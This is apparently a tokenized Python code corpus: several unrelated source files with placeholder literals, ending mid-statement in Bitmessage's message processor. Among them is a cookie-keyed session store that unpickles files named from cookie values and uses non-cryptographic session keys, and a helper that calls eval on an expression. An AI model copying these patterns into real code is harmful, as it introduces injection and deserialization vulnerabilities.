"<STR_LIT>" ] , cat = "<STR_LIT>" ) <EOL> _check_conf ( cfg [ "<STR_LIT>" ] , req_keys , cat = "<STR_LIT>" ) <EOL> def _check_data_conf ( cfg ) : <EOL> """<STR_LIT>""" <EOL> req_keys = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> _check_conf ( cfg , req_keys , cat = "<STR_LIT:data>" ) <EOL> def _check_method_conf ( cfg ) : <EOL> """<STR_LIT>""" <EOL> req_keys = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> _check_conf ( cfg , req_keys , cat = "<STR_LIT>" ) <EOL> def check_conf ( cfg , cat = "<STR_LIT>" , verbose = False ) : <EOL> """<STR_LIT>""" <EOL> if cat == "<STR_LIT>" : <EOL> _check_cv_conf ( cfg ) <EOL> elif cat == "<STR_LIT>" : <EOL> _check_method_conf ( cfg ) <EOL> elif cat == "<STR_LIT:data>" : <EOL> _check_data_conf ( cfg ) <EOL> if verbose : <EOL> print ( cfg ) <EOL> def JSONify_estimator ( est , <EOL> model_selection = False , <EOL> param_val = None , <EOL> out = None , <EOL> path_to_mr = None , <EOL> mapper = "<STR_LIT>" , <EOL> i_red = "<STR_LIT>" , <EOL> o_red = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> if path_to_mr is None : <EOL> import mempamal <EOL> 
path_to_mr = path . join ( path . dirname ( mempamal . __file__ ) , "<STR_LIT>" ) <EOL> steps = [ ] <EOL> if est . __class__ is Pipeline : <EOL> for n , s in est . steps : <EOL> t = [ repr ( s . __class__ ) . split ( "<STR_LIT>" ) [ <NUM_LIT:1> ] , s . get_params ( ) ] <EOL> steps . append ( [ n , t ] ) <EOL> else : <EOL> cl = repr ( est . __class__ ) . split ( "<STR_LIT>" ) [ <NUM_LIT:1> ] <EOL> n = cl . split ( "<STR_LIT:.>" ) [ - <NUM_LIT:1> ] <EOL> steps . append ( [ n , [ cl , est . get_params ( ) ] ] ) <EOL> conf = { } <EOL> conf [ "<STR_LIT>" ] = steps <EOL> conf [ "<STR_LIT>" ] = path . join ( path_to_mr , mapper ) <EOL> conf [ "<STR_LIT>" ] = path . join ( path_to_mr , i_red ) <EOL> conf [ "<STR_LIT>" ] = path . join ( path_to_mr , o_red ) <EOL> check_conf ( conf , cat = "<STR_LIT>" ) <EOL> if out is not None : <EOL> conf [ "<STR_LIT:src>" ] = path . basename ( out ) <EOL> with open ( out , '<STR_LIT:w>' ) as fd : <EOL> json . dump ( conf , fd , indent = <NUM_LIT:2> ) <EOL> return conf <EOL> def JSONify_cv ( cv , score_func , <EOL> cv_kwargs = None , <EOL> score_func_kwargs = None , <EOL> inner_cv = None , <EOL> inner_cv_kwargs = None , <EOL> inner_score_func = None , <EOL> inner_score_func_kwargs = None , <EOL> stratified = False , <EOL> out = None ) : <EOL> """<STR_LIT>""" <EOL> conf = { } <EOL> cv_kwargs = ( { } if cv_kwargs is None else cv_kwargs ) <EOL> if ( inner_cv is not None ) and ( inner_score_func is None ) : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> modelSelection = False if inner_cv is None else True <EOL> cv_cl = "<STR_LIT:.>" . join ( [ cv . __module__ , cv . __name__ ] ) <EOL> sf = "<STR_LIT:.>" . join ( [ score_func . __module__ , score_func . __name__ ] ) <EOL> sf_kwargs = ( { } if score_func_kwargs is None <EOL> else score_func_kwargs ) <EOL> if modelSelection : <EOL> icv_cl = "<STR_LIT:.>" . join ( [ inner_cv . __module__ , inner_cv . 
__name__ ] ) <EOL> icv_kwargs = ( { } if inner_cv_kwargs is None else inner_cv_kwargs ) <EOL> isf = "<STR_LIT:.>" . join ( [ inner_score_func . __module__ , <EOL> inner_score_func . __name__ ] ) <EOL> isf_kwargs = ( { } if inner_score_func_kwargs is None <EOL> else inner_score_func_kwargs ) <EOL> conf [ "<STR_LIT>" ] = modelSelection <EOL> conf [ "<STR_LIT>" ] = stratified <EOL> conf [ "<STR_LIT>" ] = { } <EOL> conf [ "<STR_LIT>" ] [ "<STR_LIT>" ] = [ cv_cl , cv_kwargs ] <EOL> conf [ "<STR_LIT>" ] [ "<STR_LIT>" ] = [ sf , sf_kwargs ] <EOL> if modelSelection : <EOL> conf [ "<STR_LIT>" ] = { } <EOL> conf [ "<STR_LIT>" ] [ "<STR_LIT>" ] = [ icv_cl , icv_kwargs ] <EOL> conf [ "<STR_LIT>" ] [ "<STR_LIT>" ] = [ isf , isf_kwargs ] <EOL> check_conf ( conf , cat = "<STR_LIT>" ) <EOL> if out is not None : <EOL> conf [ "<STR_LIT:src>" ] = path . basename ( out ) <EOL> with open ( out , '<STR_LIT:w>' ) as fd : <EOL> json . dump ( conf , fd , indent = <NUM_LIT:2> ) <EOL> return conf <EOL> def build_dataset ( X , y , method_conf , cv_conf , <EOL> outputdir = "<STR_LIT:.>" , <EOL> grid = None , <EOL> verbose = False , <EOL> compress = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> n_samples = X . shape [ <NUM_LIT:0> ] <EOL> n_targets = <NUM_LIT:1> if ( y . ndim == <NUM_LIT:1> ) else y . shape [ <NUM_LIT:1> ] <EOL> if n_targets > <NUM_LIT:1> : <EOL> warnings . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , RuntimeWarning ) <EOL> output_file = path . join ( outputdir , "<STR_LIT>" ) <EOL> folds = dict ( make_folds ( y , cv_conf , verbose = verbose ) , <EOL> src = path . basename ( output_file ) ) <EOL> if verbose : <EOL> print ( "<STR_LIT>" . format ( output_file ) ) <EOL> dataset = { "<STR_LIT:X>" : X , "<STR_LIT:Y>" : y , <EOL> "<STR_LIT>" : n_samples , "<STR_LIT>" : n_targets , <EOL> "<STR_LIT>" : folds , "<STR_LIT>" : grid } <EOL> joblib . dump ( dataset , output_file , compress = compress ) <EOL> return dataset </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> from PyQt4 import QtGui , uic <EOL> from util import Util <EOL> FORM_CLASS , _ = uic . loadUiType ( os . path . join ( <EOL> os . path . dirname ( __file__ ) , '<STR_LIT>' ) ) <EOL> class CKANBrowserDialogDisclaimer ( QtGui . QDialog , FORM_CLASS ) : <EOL> def __init__ ( self , settings , parent = None ) : <EOL> """<STR_LIT>""" <EOL> super ( CKANBrowserDialogDisclaimer , self ) . __init__ ( parent ) <EOL> self . setModal ( True ) <EOL> self . setupUi ( self ) <EOL> self . main_win = parent <EOL> self . settings = settings <EOL> self . util = Util ( self . settings , self . main_win ) <EOL> logo_path = self . util . resolve ( u'<STR_LIT>' ) <EOL> self . IDC_lblLogo . setPixmap ( QtGui . QPixmap ( logo_path ) ) <EOL> self . IDC_brInfo . setOpenExternalLinks ( True ) <EOL> self . IDC_brInfo . setHtml ( self . util . tr ( '<STR_LIT>' ) ) </s>
<s> _debug = <NUM_LIT:0> <EOL> eDetecting = <NUM_LIT:0> <EOL> eFoundIt = <NUM_LIT:1> <EOL> eNotMe = <NUM_LIT:2> <EOL> eStart = <NUM_LIT:0> <EOL> eError = <NUM_LIT:1> <EOL> eItsMe = <NUM_LIT:2> <EOL> SHORTCUT_THRESHOLD = <NUM_LIT> </s>
<s> from socket import _GLOBAL_DEFAULT_TIMEOUT <EOL> import time <EOL> from . . exceptions import TimeoutStateError <EOL> _Default = object ( ) <EOL> def current_time ( ) : <EOL> """<STR_LIT>""" <EOL> return time . time ( ) <EOL> class Timeout ( object ) : <EOL> """<STR_LIT>""" <EOL> DEFAULT_TIMEOUT = _GLOBAL_DEFAULT_TIMEOUT <EOL> def __init__ ( self , total = None , connect = _Default , read = _Default ) : <EOL> self . _connect = self . _validate_timeout ( connect , '<STR_LIT>' ) <EOL> self . _read = self . _validate_timeout ( read , '<STR_LIT>' ) <EOL> self . total = self . _validate_timeout ( total , '<STR_LIT>' ) <EOL> self . _start_connect = None <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> type ( self ) . __name__ , self . _connect , self . _read , self . total ) <EOL> @ classmethod <EOL> def _validate_timeout ( cls , value , name ) : <EOL> """<STR_LIT>""" <EOL> if value is _Default : <EOL> return cls . DEFAULT_TIMEOUT <EOL> if value is None or value is cls . DEFAULT_TIMEOUT : <EOL> return value <EOL> try : <EOL> float ( value ) <EOL> except ( TypeError , ValueError ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( name , value ) ) <EOL> try : <EOL> if value < <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( name , value ) ) <EOL> except TypeError : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( name , value ) ) <EOL> return value <EOL> @ classmethod <EOL> def from_float ( cls , timeout ) : <EOL> """<STR_LIT>""" <EOL> return Timeout ( read = timeout , connect = timeout ) <EOL> def clone ( self ) : <EOL> """<STR_LIT>""" <EOL> return Timeout ( connect = self . _connect , read = self . _read , <EOL> total = self . total ) <EOL> def start_connect ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _start_connect is not None : <EOL> raise TimeoutStateError ( "<STR_LIT>" ) <EOL> self . _start_connect = current_time ( ) <EOL> return self . 
_start_connect <EOL> def get_connect_duration ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _start_connect is None : <EOL> raise TimeoutStateError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return current_time ( ) - self . _start_connect <EOL> @ property <EOL> def connect_timeout ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . total is None : <EOL> return self . _connect <EOL> if self . _connect is None or self . _connect is self . DEFAULT_TIMEOUT : <EOL> return self . total <EOL> return min ( self . _connect , self . total ) <EOL> @ property <EOL> def read_timeout ( self ) : <EOL> """<STR_LIT>""" <EOL> if ( self . total is not None and <EOL> self . total is not self . DEFAULT_TIMEOUT and <EOL> self . _read is not None and <EOL> self . _read is not self . DEFAULT_TIMEOUT ) : <EOL> if self . _start_connect is None : <EOL> return self . _read <EOL> return max ( <NUM_LIT:0> , min ( self . total - self . get_connect_duration ( ) , <EOL> self . _read ) ) <EOL> elif self . total is not None and self . total is not self . DEFAULT_TIMEOUT : <EOL> return max ( <NUM_LIT:0> , self . total - self . get_connect_duration ( ) ) <EOL> else : <EOL> return self . _read </s>
<s> __author__ = '<STR_LIT>' <EOL> import random <EOL> import pickle <EOL> import os <EOL> from server . handlers import cookieHandler <EOL> import config <EOL> def get ( self , key ) : <EOL> return readSession ( self ) [ key ] <EOL> def set ( self , key , value ) : <EOL> _SESSION_ = readSession ( self ) <EOL> _SESSION_ [ key ] = value <EOL> commitSession ( self , _SESSION_ ) <EOL> def delete_all_sessions ( ) : <EOL> folder = config . __SESSIONS_DIR__ + "<STR_LIT:/>" <EOL> for the_file in os . listdir ( folder ) : <EOL> file_path = os . path . join ( folder , the_file ) <EOL> try : <EOL> if os . path . isfile ( file_path ) : <EOL> os . unlink ( file_path ) <EOL> except Exception as e : <EOL> print ( e ) <EOL> def delete_session ( key ) : <EOL> folder = config . __SESSIONS_DIR__ + "<STR_LIT:/>" <EOL> file_path = os . path . join ( folder , str ( key ) + '<STR_LIT>' ) <EOL> try : <EOL> if os . path . isfile ( file_path ) : <EOL> os . unlink ( file_path ) <EOL> except Exception as e : <EOL> print ( e ) <EOL> def newSession ( self ) : <EOL> return startSession ( self , True ) <EOL> def startSession ( self , forceStart = False ) : <EOL> session = readSessionKey ( self ) <EOL> if len ( str ( session ) ) < <NUM_LIT:10> or forceStart : <EOL> hash = random . 
getrandbits ( <NUM_LIT> ) <EOL> __SESSION__ = { } <EOL> save_obj ( __SESSION__ , hash ) <EOL> key = hash <EOL> try : <EOL> __SESSION__2 = load_obj ( key ) <EOL> except : <EOL> key = startSession ( self , True ) <EOL> __SESSION__2 = load_obj ( key ) <EOL> else : <EOL> key = readSessionKey ( self ) <EOL> try : <EOL> __SESSION__2 = load_obj ( key ) <EOL> except : <EOL> key = startSession ( self , True ) <EOL> __SESSION__2 = load_obj ( key ) <EOL> __SESSION__ = readSession ( self , key ) <EOL> return key <EOL> def commitSession ( self , __SESSION__ , key = None ) : <EOL> if key == None : <EOL> key = readSessionKey ( self ) <EOL> save_obj ( __SESSION__ , key ) <EOL> return <EOL> def readSessionKey ( self ) : <EOL> session = cookieHandler . ReadCookie ( self , config . __SESSION_COOKIE_NAME__ ) <EOL> return session <EOL> def readSession ( self , key = None ) : <EOL> if key == None : <EOL> key = readSessionKey ( self ) <EOL> __SESSION__ = { } <EOL> try : <EOL> __SESSION__2 = load_obj ( key ) <EOL> except : <EOL> key = startSession ( self , True ) <EOL> __SESSION__2 = load_obj ( key ) <EOL> return __SESSION__2 <EOL> def save_obj ( obj , name ) : <EOL> with open ( config . __SESSIONS_DIR__ + "<STR_LIT:/>" + str ( name ) + '<STR_LIT>' , '<STR_LIT:wb>' ) as f : <EOL> pickle . dump ( obj , f , pickle . HIGHEST_PROTOCOL ) <EOL> def load_obj ( name ) : <EOL> with open ( config . __SESSIONS_DIR__ + "<STR_LIT:/>" + str ( name ) + '<STR_LIT>' , '<STR_LIT:rb>' ) as f : <EOL> return pickle . load ( f ) </s>
<s> from . read import ReadTestCase , ParameterTypeTestCase <EOL> from . write import WriteTestCase , DatabaseCommandTestCase <EOL> from . transaction import AtomicTestCase <EOL> from . thread_safety import ThreadSafetyTestCase <EOL> from . multi_db import MultiDatabaseTestCase <EOL> from . settings import SettingsTestCase <EOL> from . api import APITestCase , CommandTestCase <EOL> from . signals import SignalsTestCase <EOL> from . postgres import PostgresReadTest </s>
<s> import os <EOL> from setuptools import setup , find_packages <EOL> from tree import __version__ <EOL> CURRENT_PATH = os . path . abspath ( os . path . dirname ( __file__ ) ) <EOL> with open ( os . path . join ( CURRENT_PATH , '<STR_LIT>' ) ) as f : <EOL> required = f . read ( ) . splitlines ( ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = __version__ , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> license = '<STR_LIT>' , <EOL> packages = find_packages ( ) , <EOL> install_requires = required , <EOL> include_package_data = True , <EOL> zip_safe = False , <EOL> ) </s>
<s> def id_modifier ( expression ) : <EOL> """<STR_LIT>""" <EOL> placeholder = re . compile ( "<STR_LIT>" ) <EOL> try : <EOL> return eval ( "<STR_LIT>" + placeholder . sub ( "<STR_LIT>" , expression ) . replace ( "<STR_LIT>" , "<STR_LIT:%>" ) ) <EOL> except SyntaxError as e : <EOL> error ( "<STR_LIT>" % ( e . text , '<STR_LIT:U+0020>' * ( e . offset - <NUM_LIT:1> ) ) ) </s>
<s> import time <EOL> import threading <EOL> import shared <EOL> import hashlib <EOL> import random <EOL> from struct import unpack , pack <EOL> import sys <EOL> import string <EOL> from subprocess import call <EOL> import traceback <EOL> from pyelliptic . openssl import OpenSSL <EOL> import highlevelcrypto <EOL> from addresses import * <EOL> import helper_generic <EOL> from helper_generic import addDataPadding <EOL> import helper_bitcoin <EOL> import helper_inbox <EOL> import helper_sent <EOL> from helper_sql import * <EOL> import tr <EOL> from debug import logger <EOL> import l10n <EOL> class objectProcessor ( threading . Thread ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> threading . Thread . __init__ ( self ) <EOL> """<STR_LIT>""" <EOL> queryreturn = sqlQuery ( <EOL> '''<STR_LIT>''' ) <EOL> with shared . objectProcessorQueueSizeLock : <EOL> for row in queryreturn : <EOL> objectType , data = row <EOL> shared . objectProcessorQueueSize += len ( data ) <EOL> shared . objectProcessorQueue . put ( ( objectType , data ) ) <EOL> sqlExecute ( '''<STR_LIT>''' ) <EOL> logger . debug ( '<STR_LIT>' % str ( len ( queryreturn ) ) ) <EOL> def run ( self ) : <EOL> while True : <EOL> objectType , data = shared . objectProcessorQueue . get ( ) <EOL> try : <EOL> if objectType == <NUM_LIT:0> : <EOL> self . processgetpubkey ( data ) <EOL> elif objectType == <NUM_LIT:1> : <EOL> self . processpubkey ( data ) <EOL> elif objectType == <NUM_LIT:2> : <EOL> self . processmsg ( data ) <EOL> elif objectType == <NUM_LIT:3> : <EOL> self . processbroadcast ( data ) <EOL> elif objectType == '<STR_LIT>' : <EOL> pass <EOL> else : <EOL> logger . critical ( '<STR_LIT>' % str ( objectType ) ) <EOL> except varintDecodeError as e : <EOL> logger . debug ( "<STR_LIT>" % e ) <EOL> except Exception as e : <EOL> logger . critical ( "<STR_LIT>" % traceback . format_exc ( ) ) <EOL> with shared . objectProcessorQueueSizeLock : <EOL> shared . 
objectProcessorQueueSize -= len ( data ) <EOL> if shared . shutdown : <EOL> time . sleep ( <NUM_LIT> ) <EOL> numberOfObjectsThatWereInTheObjectProcessorQueue = <NUM_LIT:0> <EOL> with SqlBulkExecute ( ) as sql : <EOL> while shared . objectProcessorQueueSize > <NUM_LIT:1> : <EOL> objectType , data = shared . objectProcessorQueue . get ( ) <EOL> sql . execute ( '''<STR_LIT>''' , <EOL> objectType , data ) <EOL> with shared . objectProcessorQueueSizeLock : <EOL> shared . objectProcessorQueueSize -= len ( data ) <EOL> numberOfObjectsThatWereInTheObjectProcessorQueue += <NUM_LIT:1> <EOL> logger . debug ( '<STR_LIT>' % str ( numberOfObjectsThatWereInTheObjectProcessorQueue ) ) <EOL> shared . shutdown = <NUM_LIT:2> <EOL> break <EOL> def processgetpubkey ( self , data ) : <EOL> readPosition = <NUM_LIT:20> <EOL> requestedAddressVersionNumber , addressVersionLength = decodeVarint ( <EOL> data [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> readPosition += addressVersionLength <EOL> streamNumber , streamNumberLength = decodeVarint ( <EOL> data [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> readPosition += streamNumberLength <EOL> if requestedAddressVersionNumber == <NUM_LIT:0> : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> return <EOL> elif requestedAddressVersionNumber == <NUM_LIT:1> : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> return <EOL> elif requestedAddressVersionNumber > <NUM_LIT:4> : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> return <EOL> myAddress = '<STR_LIT>' <EOL> if requestedAddressVersionNumber <= <NUM_LIT:3> : <EOL> requestedHash = data [ readPosition : readPosition + <NUM_LIT:20> ] <EOL> if len ( requestedHash ) != <NUM_LIT:20> : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> return <EOL> logger . info ( '<STR_LIT>' % requestedHash . encode ( '<STR_LIT>' ) ) <EOL> if requestedHash in shared . myAddressesByHash : <EOL> myAddress = shared . 
myAddressesByHash [ requestedHash ] <EOL> elif requestedAddressVersionNumber >= <NUM_LIT:4> : <EOL> requestedTag = data [ readPosition : readPosition + <NUM_LIT:32> ] <EOL> if len ( requestedTag ) != <NUM_LIT:32> : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> return <EOL> logger . debug ( '<STR_LIT>' % requestedTag . encode ( '<STR_LIT>' ) ) <EOL> if requestedTag in shared . myAddressesByTag : <EOL> myAddress = shared . myAddressesByTag [ requestedTag ] <EOL> if myAddress == '<STR_LIT>' : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return <EOL> if decodeAddress ( myAddress ) [ <NUM_LIT:1> ] != requestedAddressVersionNumber : <EOL> logger . warning ( '<STR_LIT>' ) <EOL> return <EOL> if decodeAddress ( myAddress ) [ <NUM_LIT:2> ] != streamNumber : <EOL> logger . warning ( '<STR_LIT>' ) <EOL> return <EOL> if shared . safeConfigGetBoolean ( myAddress , '<STR_LIT>' ) : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return <EOL> try : <EOL> lastPubkeySendTime = int ( shared . config . get ( <EOL> myAddress , '<STR_LIT>' ) ) <EOL> except : <EOL> lastPubkeySendTime = <NUM_LIT:0> <EOL> if lastPubkeySendTime > time . time ( ) - <NUM_LIT> : <EOL> logger . info ( '<STR_LIT>' % lastPubkeySendTime ) <EOL> return <EOL> logger . info ( '<STR_LIT>' ) <EOL> if requestedAddressVersionNumber == <NUM_LIT:2> : <EOL> shared . workerQueue . put ( ( <EOL> '<STR_LIT>' , requestedHash ) ) <EOL> elif requestedAddressVersionNumber == <NUM_LIT:3> : <EOL> shared . workerQueue . put ( ( <EOL> '<STR_LIT>' , requestedHash ) ) <EOL> elif requestedAddressVersionNumber == <NUM_LIT:4> : <EOL> shared . workerQueue . put ( ( <EOL> '<STR_LIT>' , myAddress ) ) <EOL> def processpubkey ( self , data ) : <EOL> pubkeyProcessingStartTime = time . time ( ) <EOL> shared . numberOfPubkeysProcessed += <NUM_LIT:1> <EOL> shared . UISignalQueue . 
put ( ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> embeddedTime , = unpack ( '<STR_LIT>' , data [ <NUM_LIT:8> : <NUM_LIT:16> ] ) <EOL> readPosition = <NUM_LIT:20> <EOL> addressVersion , varintLength = decodeVarint ( <EOL> data [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> readPosition += varintLength <EOL> streamNumber , varintLength = decodeVarint ( <EOL> data [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> readPosition += varintLength <EOL> if addressVersion == <NUM_LIT:0> : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> return <EOL> if addressVersion > <NUM_LIT:4> or addressVersion == <NUM_LIT:1> : <EOL> logger . info ( '<STR_LIT>' % addressVersion ) <EOL> return <EOL> if addressVersion == <NUM_LIT:2> : <EOL> if len ( data ) < <NUM_LIT> : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> return <EOL> bitfieldBehaviors = data [ readPosition : readPosition + <NUM_LIT:4> ] <EOL> readPosition += <NUM_LIT:4> <EOL> publicSigningKey = data [ readPosition : readPosition + <NUM_LIT:64> ] <EOL> readPosition += <NUM_LIT:64> <EOL> publicEncryptionKey = data [ readPosition : readPosition + <NUM_LIT:64> ] <EOL> if len ( publicEncryptionKey ) < <NUM_LIT:64> : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> return <EOL> readPosition += <NUM_LIT:64> <EOL> dataToStore = data [ <NUM_LIT:20> : readPosition ] <EOL> sha = hashlib . new ( '<STR_LIT>' ) <EOL> sha . update ( <EOL> '<STR_LIT>' + publicSigningKey + '<STR_LIT>' + publicEncryptionKey ) <EOL> ripeHasher = hashlib . new ( '<STR_LIT>' ) <EOL> ripeHasher . update ( sha . digest ( ) ) <EOL> ripe = ripeHasher . digest ( ) <EOL> logger . debug ( '<STR_LIT>' % ( addressVersion , <EOL> streamNumber , <EOL> ripe . encode ( '<STR_LIT>' ) , <EOL> publicSigningKey . encode ( '<STR_LIT>' ) , <EOL> publicEncryptionKey . encode ( '<STR_LIT>' ) <EOL> ) <EOL> ) <EOL> address = encodeAddress ( addressVersion , streamNumber , ripe ) <EOL> queryreturn = sqlQuery ( <EOL> '''<STR_LIT>''' , address ) <EOL> if queryreturn != [ ] : <EOL> logger . 
info ( '<STR_LIT>' ) <EOL> t = ( address , addressVersion , dataToStore , int ( time . time ( ) ) , '<STR_LIT:yes>' ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' ) <EOL> t = ( address , addressVersion , dataToStore , int ( time . time ( ) ) , '<STR_LIT>' ) <EOL> sqlExecute ( '''<STR_LIT>''' , * t ) <EOL> self . possibleNewPubkey ( address ) <EOL> if addressVersion == <NUM_LIT:3> : <EOL> if len ( data ) < <NUM_LIT> : <EOL> logger . warning ( '<STR_LIT>' ) <EOL> return <EOL> bitfieldBehaviors = data [ readPosition : readPosition + <NUM_LIT:4> ] <EOL> readPosition += <NUM_LIT:4> <EOL> publicSigningKey = '<STR_LIT>' + data [ readPosition : readPosition + <NUM_LIT:64> ] <EOL> readPosition += <NUM_LIT:64> <EOL> publicEncryptionKey = '<STR_LIT>' + data [ readPosition : readPosition + <NUM_LIT:64> ] <EOL> readPosition += <NUM_LIT:64> <EOL> specifiedNonceTrialsPerByte , specifiedNonceTrialsPerByteLength = decodeVarint ( <EOL> data [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> readPosition += specifiedNonceTrialsPerByteLength <EOL> specifiedPayloadLengthExtraBytes , specifiedPayloadLengthExtraBytesLength = decodeVarint ( <EOL> data [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> readPosition += specifiedPayloadLengthExtraBytesLength <EOL> endOfSignedDataPosition = readPosition <EOL> dataToStore = data [ <NUM_LIT:20> : readPosition ] <EOL> signatureLength , signatureLengthLength = decodeVarint ( <EOL> data [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> readPosition += signatureLengthLength <EOL> signature = data [ readPosition : readPosition + signatureLength ] <EOL> if highlevelcrypto . verify ( data [ <NUM_LIT:8> : endOfSignedDataPosition ] , signature , publicSigningKey . encode ( '<STR_LIT>' ) ) : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> else : <EOL> logger . warning ( '<STR_LIT>' ) <EOL> return <EOL> sha = hashlib . new ( '<STR_LIT>' ) <EOL> sha . update ( publicSigningKey + publicEncryptionKey ) <EOL> ripeHasher = hashlib . 
new ( '<STR_LIT>' ) <EOL> ripeHasher . update ( sha . digest ( ) ) <EOL> ripe = ripeHasher . digest ( ) <EOL> logger . debug ( '<STR_LIT>' % ( addressVersion , <EOL> streamNumber , <EOL> ripe . encode ( '<STR_LIT>' ) , <EOL> publicSigningKey . encode ( '<STR_LIT>' ) , <EOL> publicEncryptionKey . encode ( '<STR_LIT>' ) <EOL> ) <EOL> ) <EOL> address = encodeAddress ( addressVersion , streamNumber , ripe ) <EOL> queryreturn = sqlQuery ( '''<STR_LIT>''' , address ) <EOL> if queryreturn != [ ] : <EOL> logger . info ( '<STR_LIT>' ) <EOL> t = ( address , addressVersion , dataToStore , int ( time . time ( ) ) , '<STR_LIT:yes>' ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' ) <EOL> t = ( address , addressVersion , dataToStore , int ( time . time ( ) ) , '<STR_LIT>' ) <EOL> sqlExecute ( '''<STR_LIT>''' , * t ) <EOL> self . possibleNewPubkey ( address ) <EOL> if addressVersion == <NUM_LIT:4> : <EOL> if len ( data ) < <NUM_LIT> : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> return <EOL> tag = data [ readPosition : readPosition + <NUM_LIT:32> ] <EOL> if tag not in shared . neededPubkeys : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return <EOL> toAddress , cryptorObject = shared . neededPubkeys [ tag ] <EOL> if shared . decryptAndCheckPubkeyPayload ( data , toAddress ) == '<STR_LIT>' : <EOL> self . possibleNewPubkey ( toAddress ) <EOL> timeRequiredToProcessPubkey = time . time ( <EOL> ) - pubkeyProcessingStartTime <EOL> logger . debug ( '<STR_LIT>' % timeRequiredToProcessPubkey ) <EOL> def processmsg ( self , data ) : <EOL> messageProcessingStartTime = time . time ( ) <EOL> shared . numberOfMessagesProcessed += <NUM_LIT:1> <EOL> shared . UISignalQueue . put ( ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> readPosition = <NUM_LIT:20> <EOL> msgVersion , msgVersionLength = decodeVarint ( data [ readPosition : readPosition + <NUM_LIT:9> ] ) <EOL> if msgVersion != <NUM_LIT:1> : <EOL> logger . 
info ( '<STR_LIT>' ) <EOL> return <EOL> readPosition += msgVersionLength <EOL> streamNumberAsClaimedByMsg , streamNumberAsClaimedByMsgLength = decodeVarint ( <EOL> data [ readPosition : readPosition + <NUM_LIT:9> ] ) <EOL> readPosition += streamNumberAsClaimedByMsgLength <EOL> inventoryHash = calculateInventoryHash ( data ) <EOL> initialDecryptionSuccessful = False <EOL> if data [ - <NUM_LIT:32> : ] in shared . ackdataForWhichImWatching : <EOL> logger . info ( '<STR_LIT>' ) <EOL> del shared . ackdataForWhichImWatching [ data [ - <NUM_LIT:32> : ] ] <EOL> sqlExecute ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> int ( time . time ( ) ) , <EOL> data [ - <NUM_LIT:32> : ] ) <EOL> shared . UISignalQueue . put ( ( '<STR_LIT>' , ( data [ - <NUM_LIT:32> : ] , tr . translateText ( "<STR_LIT>" , '<STR_LIT>' ) . arg ( l10n . formatTimestamp ( ) ) ) ) ) <EOL> return <EOL> else : <EOL> logger . info ( '<STR_LIT>' ) <EOL> for key , cryptorObject in shared . myECCryptorObjects . items ( ) : <EOL> try : <EOL> decryptedData = cryptorObject . decrypt ( data [ readPosition : ] ) <EOL> toRipe = key <EOL> initialDecryptionSuccessful = True <EOL> logger . info ( '<STR_LIT>' % key . encode ( '<STR_LIT>' ) ) <EOL> break <EOL> except Exception as err : <EOL> pass <EOL> if not initialDecryptionSuccessful : <EOL> logger . info ( '<STR_LIT>' % ( time . time ( ) - messageProcessingStartTime , ) ) <EOL> return <EOL> toAddress = shared . myAddressesByHash [ <EOL> toRipe ] <EOL> readPosition = <NUM_LIT:0> <EOL> sendersAddressVersionNumber , sendersAddressVersionNumberLength = decodeVarint ( <EOL> decryptedData [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> readPosition += sendersAddressVersionNumberLength <EOL> if sendersAddressVersionNumber == <NUM_LIT:0> : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return <EOL> if sendersAddressVersionNumber > <NUM_LIT:4> : <EOL> logger . info ( '<STR_LIT>' 